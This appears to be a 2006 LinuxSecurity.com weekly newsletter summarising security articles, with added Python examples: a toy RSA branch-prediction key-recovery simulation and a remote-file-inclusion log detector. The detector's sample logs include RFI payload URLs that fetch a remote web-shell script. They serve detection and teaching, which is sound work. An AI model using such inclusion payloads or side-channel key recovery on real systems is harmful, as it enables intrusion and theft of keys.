RFID with Bio-Smart Card in Linux - In this paper, we describe the integration
of fingerprint templates and an RF smart card for a clustered network, designed
on the Linux platform with open source technology to obtain biometric security.
Combining the smart card and biometrics achieves two-step authentication: the
smart card is authenticated with a Personal Identification Number (PIN), and the
card holder is then authenticated by fingerprint verification against the
biometric template stored in the smart card. The fingerprint verification is
executed on the central host server for security reasons. The protocol designed
allows control of all parameters of the smart security controller, such as PIN
options, reader delay, real-time clock, alarm option and cardholder access
conditions.
pgp Key
Signing Observations: Overlooked Social and Technical Considerations
- While there are several sources of technical information on using pgp in
general, and key signing in particular, this article emphasizes social aspects
of key signing that are too often ignored, misleading or incorrect in the
technical literature. There are also technical issues pointed out where I
believe other documentation to be lacking. It is important to acknowledge
and address social aspects in a system such as pgp, because the weakest link
in the system is the human that is using it. The algorithms, protocols and
applications used as part of a pgp system are relatively difficult to compromise
or 'break', but the human user can often be easily fooled. Since the human
is the weak link in this chain, attention must be paid to actions and decisions
of that human; users must be aware of the pitfalls and know how to avoid them.
Bulletproof
Virus Protection - Protect your network from costly security
breaches with Guardian Digital’s multi-faceted security applications.
More than just an email firewall, on-demand and scheduled scanning detects
and disinfects viruses found on the network. Click
to find out more!
Take advantage of our Linux Security discussion
list! This mailing list is for general security-related questions and comments.
To subscribe send an e-mail to security-discuss-request@linuxsecurity.com
with "subscribe" as the subject.
Earn an NSA recognized IA
Masters Online - The NSA has designated Norwich University a center
of Academic Excellence in Information Security. Our program offers unparalleled
Infosec management education and the case study affords you unmatched consulting
experience. Using interactive e-Learning technology, you can earn this esteemed
degree, without disrupting your career or home life.
Protect your home and business networks with the free, community version of
EnGarde Secure Linux. Don't rely only on a firewall to protect your network,
because firewalls can be bypassed. EnGarde Secure Linux is a security-focused
Linux distribution made to protect your users and their data.
Thank you for reading the LinuxSecurity.com
weekly security newsletter. The purpose of this document is to provide our readers
with a quick summary of each week's most relevant Linux security headlines.
A New Vulnerability In RSA Cryptography
20th, November, 2006
"Branch Prediction Analysis is a recent attack vector against RSA public-key cryptography on personal computers that relies on timing measurements to get information on the bits in the private key. However, the method is not very practical because it requires many attempts to obtain meaningful information, and the current OpenSSL implementation now includes protections against those attacks. However, German cryptographer Jean-Pierre Seifert has announced a new method called Simple Branch Prediction Analysis that is at the same time much more efficient than the previous ones, only needs a single attempt, successfully bypasses the OpenSSL protections, and should prove harder to avoid without a very large execution penalty."
Deep CPU pipelines paired with the CPU’s ability to fetch and issue multiple instructions at every machine cycle led to the concept of superscalar processors. Superscalar processors admit a theoretical or best-case performance of less than 1 machine cycle per completed instruction, cf. [She]. However, the inevitably required branch instructions in the underlying machine languages were very soon recognized as one of the most painful performance killers of superscalar processors. Not surprisingly, CPU architects quickly invented the concept of branch predictors in order to circumvent those performance bottlenecks. Thus, it is not surprising that there has been vibrant and very practical research on more and more sophisticated branch prediction mechanisms, cf. [PH,Sha,She]. Unfortunately, a very recent paper, cf. [ASK], identified branch prediction as a novel and unforeseen side-channel, thus being another new security threat within the computer security field. Let us elaborate a little bit on this connection between side-channel attacks and modern computer-architecture ingredients.
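The following Python simulation is an added illustration, not code from the paper or from OpenSSL, of why the square-and-multiply loop at the heart of RSA leaks through the branch predictor. The `observer` list stands in for the spy process: real SBPA recovers each branch outcome from predictor timing, here the outcomes are simply recorded to show that one execution gives away the whole exponent. The RSA parameters in the usage block are toy values constructed for the example, and the branch-free variant only demonstrates the control-flow structure (Python integers are not constant-time).

```python
def modexp_branchy(base, d, m, nbits, observer=None):
    """Left-to-right square-and-multiply, the textbook RSA inner loop.
    The `if bit:` is a branch whose direction is the secret key bit;
    that branch outcome is what Branch Prediction Analysis recovers."""
    r = 1 % m
    for i in range(nbits - 1, -1, -1):
        r = (r * r) % m
        bit = (d >> i) & 1
        if observer is not None:
            observer.append(bit)      # predictor sees taken (1) / not taken (0)
        if bit:                       # key-dependent branch
            r = (r * base) % m
    return r


def modexp_branchless(base, d, m, nbits, observer=None):
    """Same exponentiation with no key-dependent branch: compute both the
    square and the multiply every iteration and select with an arithmetic
    mask. `observer` is accepted for symmetry but never written to, because
    there is no branch on the key bit to observe. The cost is one extra
    multiplication per bit, the 'execution penalty' the article mentions."""
    r = 1 % m
    for i in range(nbits - 1, -1, -1):
        sq = (r * r) % m
        mul = (sq * base) % m
        mask = -((d >> i) & 1)            # -1 (all ones) if bit set, else 0
        r = (mul & mask) | (sq & ~mask)   # select without branching
    return r


def recover_exponent(trace):
    """What the attacker does with one observed trace: the branch outcomes,
    read most-significant bit first, are the private exponent's bits."""
    d = 0
    for bit in trace:
        d = (d << 1) | bit
    return d


if __name__ == "__main__":
    # Constructed toy RSA key: p=61, q=53, n=3233, e=17, d=2753 (12-bit d).
    n, e, d = 3233, 17, 2753
    c = pow(42, e, n)
    seen = []
    assert modexp_branchy(c, d, n, 12, seen) == 42
    print("observed branch outcomes:", seen)
    print("recovered d:", recover_exponent(seen))      # 2753, from one run
    seen = []
    assert modexp_branchless(c, d, n, 12, seen) == 42
    print("branchless trace:", seen)                    # []
```

The point of the two functions side by side is that the leak is not in the arithmetic but in the instruction stream: as long as the multiply is conditionally skipped, every iteration tells the predictor (and anyone who can probe it) one bit of `d`. A real implementation must also ensure the compiler does not turn the mask select back into a branch and that memory accesses are independent of the key.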
Book Review: Security Threat Mitigation and Response
24th, November, 2006
When it comes to network security, Cisco is actively involved in coming up with some of the very best solutions to troublesome problems that unexpectedly occur. When it comes to books about security, however, Cisco Press has an uneven batting average. Some of the books are good, while others leave you wondering how they made it through the editing stage. Looking at words like “paradigm” on the back cover of this title, my spine began to get a familiar tingle, but in this case, I am happy to report, they have hit a home run.
Cisco Security MARS (Monitoring, Analysis, and Response System) is a product intended to work with your network and identify (as well as prevent) problems early on. It is also intended to boost data privacy to the point where compliance becomes a certainty. Given the customization that is possible and the importance of getting it right, a book on the topic that is detailed and easy to read is almost a necessity.
Security researcher John Heasman released a paper this week describing a way to hide malicious code on graphics and network cards in such a way as to avoid detection and survive a full re-installation of the operating system. The paper (PDF), published on Wednesday, builds on the work presented by Heasman earlier this year, describing ways to use the Advanced Configuration and Power Interface (ACPI) functions available on almost all motherboards to store and run a rootkit that could survive a reboot. The current paper outlines ways to use the expansion memory available on Peripheral Component Interconnect (PCI) cards, such as graphics cards and network cards.
This paper is a sequel to my “Learn Information Gathering By Example”. This paper will go through looking for Vulnerabilities in remote system(s), which is what you would do in a Penetration Test after gathering information on the target. I will be using real world examples for nearly everything in this paper. Although I covered scanning a network range for possible targets in my last paper I will cover it again in this paper, because it is related. I am aware that 99.5 % of people will already know how to do this, and should know how to do it. For the sake of complete beginners I will cover it again.
Using Nepenthes Honeypots to Detect Common Malware
20th, November, 2006
In the past few years, a number of serious flaws in Windows have been exposed, including MS03-026 [ref 1], the flaw that Blaster [ref 2] used to spread in 2003, right up to the recent Mocbot/Wargbot worm [ref 3] which exploited MS06-040 [ref 4] from August 2006. The number of distinct pieces of malware exploiting these flaws has rapidly increased over the same time period. There are several variants of most worms and many more than that of most of the bot families, such as Agobot, Phatbot, Sdbot, and so on. As is now well-known, bots are collections of compromised "zombie" computers used together in a botnet network for nefarious purposes. In the paper, they give detection rates for newly captured malware ranging between 73% and 84% across four different antivirus engines. Clearly, relying on antivirus software is not going to work for everyone, all the time. In this paper we describe how a particular low-interaction honeypot, Nepenthes [ref 6], can be used to quickly alert an administrator to a network compromise. It captures malware and can assist in containing and removing the infection.
Viruses and worms pose some of the most formidable threats in the modern computer security landscape, with some virus writers on the bleeding edge of technology, making use of 0-day exploits and innovative techniques to circumvent system security features. However, for every Blaster, there’s a worm that repeatedly attempts to infect the same machine. For every 100,000 node botnet Spybot infection there are 20 variants that fail to get as far as even connecting to an IRC server. For every Netsky, there’s an intended mass mailer that crashes before it sends a single copy of itself out. From exploitable vulnerabilities in their code to incomprehensible goofs, there’s no shortage of evidence that a large proportion of virus writers aren’t quite as capable as they would like others to think. This paper will take a look at the legacy of these slightly less than expert level virus writers, and examine the threat they continue to pose.
The report advises implementation of a "least privilege" environment to reduce the impact of such attacks.
Marco Peretti, chief technical officer at security firm BeyondTrust, agreed with the findings of the Sans Institute, urging users to follow the "principle of least privilege" in setting user access controls, permissions and rights.
Peretti also suggested restricting or limiting the use of active code such as JavaScript or ActiveX in browsers.
.htaccess files provide a way to make configuration changes on a per-directory basis. They work with the Apache web server on Linux/Unix, and also on Windows systems running Apache. There are several things that developers, site owners and webmasters can do with a .htaccess file. Let’s look at some of them: prevent directory browsing, redirect visitors from one page or directory to another, password-protect directories, change the default index page of a directory, and prevent hot-linking of images from your website.
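As an added example (not from the article), one .htaccess file that does all five of the things listed above. The file paths, the example.com hostname and the page names are assumptions for illustration; Apache does not accept comments on the same line as a directive, so each note sits on its own line.

```apache
# Prevent directory browsing when no index page exists
Options -Indexes

# Redirect visitors from one page to another (permanent redirect, mod_alias)
Redirect 301 /old-page.html /new-page.html

# Password protection for this directory (HTTP Basic auth).
# Keep the password file outside the document root so it can never be served.
AuthType Basic
AuthName "Members only"
AuthUserFile /var/www/private/.htpasswd
Require valid-user

# Change the default index page of this directory
DirectoryIndex home.html index.html

# Prevent hot-linking of images (mod_rewrite). Requests with an empty
# Referer are allowed so direct visits and privacy-conscious browsers still work.
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^https?://(www\.)?example\.com/ [NC]
RewriteRule \.(gif|jpe?g|png)$ - [F,NC]
```

Two caveats a practitioner should keep in mind. First, none of this takes effect unless the enclosing `<Directory>` in the server configuration grants `AllowOverride` for the relevant groups (Options, FileInfo, AuthConfig, Indexes), and the password file must be created with `htpasswd -c /var/www/private/.htpasswd username` before the directory becomes reachable. Second, the hot-link rule is only a nuisance for casual copying: the Referer header is under the client's control and can be blanked or forged, and Basic auth sends credentials in cleartext unless the site is served over HTTPS.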
Web 2.0 is the novel term coined for new generation Web applications. start.com, Google maps, Writely and MySpace.com are a few examples. The shifting technological landscape is the driving force behind these Web 2.0 applications. On the one hand are Web services that are empowering server-side core technology components and on the other hand are AJAX and Rich Internet Application (RIA) clients that are enhancing client-end interfaces in the browser itself. XML is making a significant impact at both presentation and transport (HTTP/HTTPS) layers. To some extent XML is replacing HTML at the presentation layer while SOAP is becoming the XML-based transport mechanism of choice.
I first touched a BSD box in around 1994, thanks to the donation of a BSD/OS system and SLIP connection from UUNet to my high school. It was love at first sight! Discovering FreeBSD not long after, I've been a regular FreeBSD user since around 1995, although I only became involved in FreeBSD development in 1999, gaining a "commit bit" to help maintain the FreeBSD portions of the Coda distributed file system, a project I had worked on while at Carnegie Mellon University. My undergraduate degree is in Logic and Computation, from CMU's philosophy department, along with a double major in Computer Science, but it became clear that my greatest interest lay in operating systems and security. After working on file system ACLs and mandatory access control for FreeBSD, I started the TrustedBSD Project in 2000, with the goal of bringing more advanced security features to the platform. In 2001, while working at Network Associates Laboratories (NAI Labs, and later McAfee Research), I proposed and became Principal Investigator on a research project as part of DARPA's CHATS research program, which was investigating security and open source. This project included sponsoring and developing UFS2, OpenPAM, the TrustedBSD MAC Framework, NSS support, PAE support, several network stack hardening projects (including syncache and syncookies for FreeBSD), GEOM, and GBDE.
The following steps will help you secure personal storage drives, both on and off the network. Recent events in the industry have been cause for concern, leading IT professionals to understand that new policies and technologies must be set in place to protect information being stored on personal storage devices.
Developed to help human rights activists to communicate safely via the net, Zimmermann's software is deployed by more than 35,000 businesses and millions of individuals. In the last 15 years encryption has grown from a product of questionable legal status to a government-mandated approach to protecting sensitive ecommerce transactions. Strong encryption used to be viewed as something 'dodgy', prompting the question: "what are you trying to hide?" Now firms are legally required to encrypt data or risk falling foul of information disclosure laws and corporate governance regulations.
Zimmermann says PGP has been "more successful than I first envisioned", even though email encryption technology is less commonplace than many pundits predicted in the late 1990s.
Why Administrative Passwords Will Never Be Like Nuclear Missile Launchers
23rd, November, 2006
During the past few months many people have lamented that Windows lacks a nuclear missile style control option for administrator passwords. Surely you've read about or seen photographs of missile silos where two operators, separated by a distance greater than the span of a single human's arms, must each simultaneously turn a key in a switch to launch a missile. Such a fail-safe is important when considering missile launches: presumably a nation can't thus be committed to global thermonuclear war on the deranged whims of a single raving lunatic.
The Seven Deadly Sins of Records Retention (And how to avoid them)
25th, November, 2006
Sure, you're thinking, records retention can be deadly. Deadly dull. "I don't want to own that," TriWest Healthcare CSO John Pontrelli said to himself when people came poking around about it - this after the US Department of Defense, TriWest's only customer, announced it was going to audit the company's document retention practices. "It's just one of those thankless kinds of jobs," Pontrelli continues, noting that he'd rather keep his security staff focused on its core business. "I can't become the retention police." Records retention has always been about as sexy as Birkenstocks with socks. Even the nomenclature - retention - has an unsavoury connotation, something better left to the clinically uptight. But recent legal actions have made document retention programs not just boring but risky.
Google can be utilized to hack into websites - actively exploiting them (not information gathering by the use of "Google hacking", although that is how most of the sites vulnerable to RFI attacks are found).
By placing a URL on any web page, Google will find it, visit it and then index it. With this mechanism, it is possible to anonymize attacks on third party web sites through Google by the use of its crawler.
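An added example of the defender's side of this (not code from the article): the victim's access log shows the crawler as the source, so blocking or whitelisting by User-Agent or crawler IP is the wrong reflex. What actually identifies the attempt is the query parameter carrying a remote URL, regardless of who fetched it. The log lines below are constructed in Apache "combined" format using documentation address ranges; the log format, parameter names and the `allowed_hosts` list are assumptions for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (not from any real server). The first
# request is the pattern the article describes: a crawler following a planted
# link whose query string points at a remote script. The trailing '?' is the
# common trick to swallow any suffix the vulnerable include appends.
SAMPLE_LOG = """\
192.0.2.66 - - [21/Nov/2006:10:12:01 +0000] "GET /index.php?page=http://203.0.113.9/c99.txt? HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
192.0.2.7 - - [21/Nov/2006:10:12:05 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "http://example.com/" "Mozilla/5.0"
198.51.100.4 - - [21/Nov/2006:10:13:44 +0000] "GET /gallery.php?dir=ftp://198.51.100.4/x.php HTTP/1.0" 500 311 "-" "curl/7.15"
192.0.2.8 - - [21/Nov/2006:10:14:00 +0000] "GET /redirect?url=http%3A%2F%2Fexample.com%2Fhelp HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def rfi_candidates(log_text, allowed_hosts=()):
    """Return one record per query parameter whose value is a remote URL,
    the signature of a remote-file-inclusion attempt, skipping hosts the
    application legitimately accepts. The crawler User-Agent is recorded
    for triage but is deliberately not a reason to skip the line: a request
    relayed through a search engine's crawler is still an attack."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        # parse_qsl percent-decodes once, so encoded "http%3A%2F%2F" is caught
        for name, value in parse_qsl(query, keep_blank_values=True):
            if not REMOTE_URL_RE.match(value):
                continue
            host = (urlsplit(value).hostname or "").lower()
            if host in allowed_hosts:
                continue
            hits.append({
                "ip": m["ip"],
                "time": m["ts"],
                "param": name,
                "value": value,
                "status": int(m["status"]),
                "crawler_ua": "googlebot" in m["ua"].lower(),
            })
    return hits


if __name__ == "__main__":
    for h in rfi_candidates(SAMPLE_LOG, allowed_hosts={"example.com"}):
        note = " (relayed via crawler: find the page that planted the link)" if h["crawler_ua"] else ""
        print(f'{h["time"]} {h["ip"]} {h["param"]}={h["value"]} status={h["status"]}{note}')
```

Run over the constructed log, this flags the crawler-relayed `page=http://...` request and the direct `ftp://` attempt, and ignores both the ordinary `page=about` request and the redirect to an allowed host. A 200 status on the flagged line is the worrying case: it means the include most likely succeeded, and the real attacker is whoever placed the link that the crawler followed, which the victim's own log cannot tell you.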
As far as Kerry Anderson is concerned, insiders are as big a threat to her company's IT security as worms and spyware -- perhaps bigger. And like malware, insiders come in many variants. Anderson, a vice president in the information security group at Fidelity Investments Brokerage Company, explained the different types of insider threats and ways companies can address them at the MIS Training Institute's Annual Conference and Expo on Control and Audit of Information Technology in Boston last week. The best way to deal with any potential inside threat, she said, is to let everyone know Big Brother is watching them and that they can be fired for any security violation.
We have all three hours of the audio for the recent "Privacy is Dead" talk available at the HOPE Number Six site. You can either stream it or download it, just like all the other HOPE talks.
Hacking Email: 99 Tips To Make You More Secure And Productive
22nd, November, 2006
When people read out a phone number, they use "phone rhythm." No one has to explain "phone rhythm," we all just seem to do it automatically, "…713...555...12…34". Similarly, when we answer a phone call we all say, "Hello." No one taught us to do that, but somehow we all seemed to pick it up. So why is it that when it comes to emails, there are no accepted standards? Even though 6 billion emails are sent every day, almost no one agrees about simple things like email etiquette, how to organize a note, or whether emails are considered private or not. The 99 tips in this article make up the best in email practices. From how to ethically use the ‘BCC:' to what attachments will make your mobile emailing compatible with everyone else's, this list covers everything you need to know about emailing.
As I mentioned in my DEFCON highlights article back in September, I learned about a group called kaos.theory who discussed an anonymity tool called SAMAEL (Secure, Anonymizing, Megalomaniacal, Autonomous, Encrypting Linux). I haven’t seen this tool made available yet, so I decided to take a look at their first offering: Anonym.OS, a LiveCD built on OpenBSD that allows you to utilize the Tor network, along with Privoxy, to surf the Internet anonymously. To start, I thought it might be useful to understand what the two underlying tools were all about before I jumped into Anonym.OS.
The Tor network is an intriguing concept: build a bunch of servers around the Internet to route traffic through so that your connections can’t be traced. Why would you want to do that? Well, for several reasons, like you don’t want your web activity being traced by marketing people or spammers so they can come back and get you later. The really cool thing about Tor is that it’s not a hosted service; it’s a free toolset so that people can set up their own to help support the project and share their bandwidth.
IBM completes UK government Linux security testing
21st, November, 2006
Questions in the House of Lords in June 2005 revealed that the Cabinet Office's Central Sponsor for Information Assurance unit was developing proof-of-concept systems using Security-Enhanced Linux (SELinux) to support remote working and web services. In May this year IBM revealed that it was involved in the project along with Red Hat, Tresys Technology, and Belmin Group.
The new Police and Justice Act, published today, could criminalise legitimate IT security activity. There are fears amongst security experts that changes it makes to the Computer Misuse Act will make it illegal to distribute some vital tools.
The new law modifies the Computer Misuse Act of 1990, the cornerstone of Britain's anti-hacking law. The changes make clear for the first time that denial of service attacks are an offence; but they also address the distribution of hacking tools.
The new Act will make a person guilty of an offence "if he supplies or offers to supply any article believing that it is likely to be used to commit, or to assist in the commission of, [a hacking offence]." The word "article" is defined in the Act to include "any program or data held in electronic form".